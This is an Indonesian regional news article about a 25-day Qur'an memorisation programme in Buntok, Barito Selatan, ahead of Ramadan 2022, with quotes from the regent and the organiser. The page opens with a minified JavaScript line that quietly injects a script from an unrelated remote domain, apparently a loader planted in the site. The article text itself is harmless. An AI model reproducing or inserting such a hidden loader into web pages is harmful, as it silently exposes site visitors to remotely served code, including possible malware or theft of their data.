(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
RELIGI

Jelang Ramadhan, Rumah Karantina Tahfiz Al Qur’an di Buntok Berlangsung 25 Hari


KANALKALIMANTAN.COM, BUNTOK – Rumah Karantina Tahfiz Al Qur’an kembali diadakan di Kabupaten Barito Selatan (Barsel), menjadi kegiatan mengisi bulan suci Ramadhan setiap tahunnya. Salah satu upaya membentuk pendidikan nilai-nilai Al Qur’an dan membina kepribadian seorang muslim sejak dini.

Kegiatan Rumah Karantina Tahfiz Al Qur’an 1443 Hijriyah dibuka Bupati Barito Selatan (Barsel) H Eddy Raya Samsuri ST. Kegiatan ini digelar selama 25 hari saat Ramadhan khusus hafalan Al Qur’an yang diikuti sebanyak 130 peserta.

Bupati Barsel mengatakan kegiatan ini memiliki peran penting dalam upaya menumbuh kembangkan minat baca Al Qur’an di masyarakat, sehingga program pemerintah untuk membumikan Al Qur’an dapat terwujud.

“Melalui rumah karantina tahfiz Al Qur’an ini patut kita dukung, karena di kabupaten ini akan muncul ahli-ahli Al Qur’an dan penghapal Al Qur’an yang akan memakmurkan agama di pelosok-pelosok desa wilayah Barito Selatan,” kata H Eddy Raya, Rabu (30/3/2022).

 

Baca juga  : Laga Persahabatan, Allstar Family Buntok Ladeni Mutiara Hitam dari Balangan

Orang nomor satu di Pemkab Barsel itu juga berpesan, agar para santri yang mengikuti karantina tahfiz Al Qur’an bersungguh-sungguh dalam menghapal.

Masa sekarang anak-anak yang tengah dihadapkan dengan pengaruh globalisasi, sangat terdampak pada kemerosotan moral generasi muda Islam.
“Supaya generasi muda kita ini tidak terseret, semua pihak harus bergandengan tangan untuk membentenginya dengan nilai-nilai keagamaan,” pinta Eddy Raya.

Ketua Panitia Pelaksana kegiatan Tahfiz Qur’an H Muhammad Sibawaihi Lc mengatakan, pelaksanaan tahfiz Al Qur’an tahun ini merupakan yang ketiga kalinya dalam mengisi waktu bulan Ramadhan.

“Tentunya ini menjadi syukur bagi kita semua, dengan setiap tahunnya semakin banyak perkembangan dan semakin banyak dukungan dari segala pihak dalam pelaksanaan kegiatan ini,” ujar Sibawaihi.

 

Baca juga  : Soal Pilkades Serentak, Ini Wanti-wanti Ketua Komisi I DPRD Kapuas

Ditambahkannya, pihaknya hanya memfasilitasi kegiatan saja, karena semua biaya kegiatan dari swadaya santri dibantu pihak dermawan yang ingin kegiatan ini terlaksana.

“Jadi kita sangat bersyukur, banyak bantuan dari berbagai pihak baik dari pemerintah daerah, para dermawan dari Bartim hingga Kapuas,” beber H Sibawaihi.(Kanalkalimantan.com/digdo)

Reporter : digdo
Editor : bie


Desy Arfianty

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

9 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

9 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

9 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

10 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

10 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

10 jam ago

This website uses cookies.